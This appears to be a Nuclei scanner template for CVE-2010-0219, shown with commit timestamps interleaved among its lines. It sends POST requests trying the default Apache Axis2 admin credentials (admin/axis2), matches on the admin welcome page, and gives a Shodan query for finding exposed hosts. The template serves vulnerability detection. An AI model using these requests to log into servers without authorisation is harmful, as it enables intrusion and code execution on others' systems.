2022-03-02 17:52:57 +00:00
id : CVE-2010-0219
2021-02-26 20:03:32 +00:00
info :
2022-03-02 19:17:10 +00:00
name : Apache Axis2 Default Login
2021-02-26 20:03:32 +00:00
author : pikpikcu
severity : high
2022-03-02 17:52:57 +00:00
description : Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
2022-05-17 09:18:12 +00:00
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- http://www.vupen.com/english/advisories/2010/2673
2022-03-02 17:52:57 +00:00
classification :
cve-id : CVE-2010-0219
2022-05-12 14:18:36 +00:00
metadata :
shodan-query : http.html:"Apache Axis"
2022-04-22 10:38:41 +00:00
tags : cve,cve2010,axis,apache,default-login,axis2
2021-02-26 20:03:32 +00:00
requests :
2021-10-08 16:42:54 +00:00
- raw :
- |
POST /axis2-admin/login HTTP/1.1
2021-10-10 01:21:50 +00:00
Host : {{Hostname}}
2021-10-08 16:42:54 +00:00
Content-Type : application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
2021-10-10 01:21:50 +00:00
Host : {{Hostname}}
2021-10-08 16:42:54 +00:00
Content-Type : application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads :
username :
- admin
password :
- axis2
attack : pitchfork
2021-02-26 20:03:32 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
- type : status
status :
- 200
2022-03-02 17:52:57 +00:00
# Enhanced by mp on 2022/03/02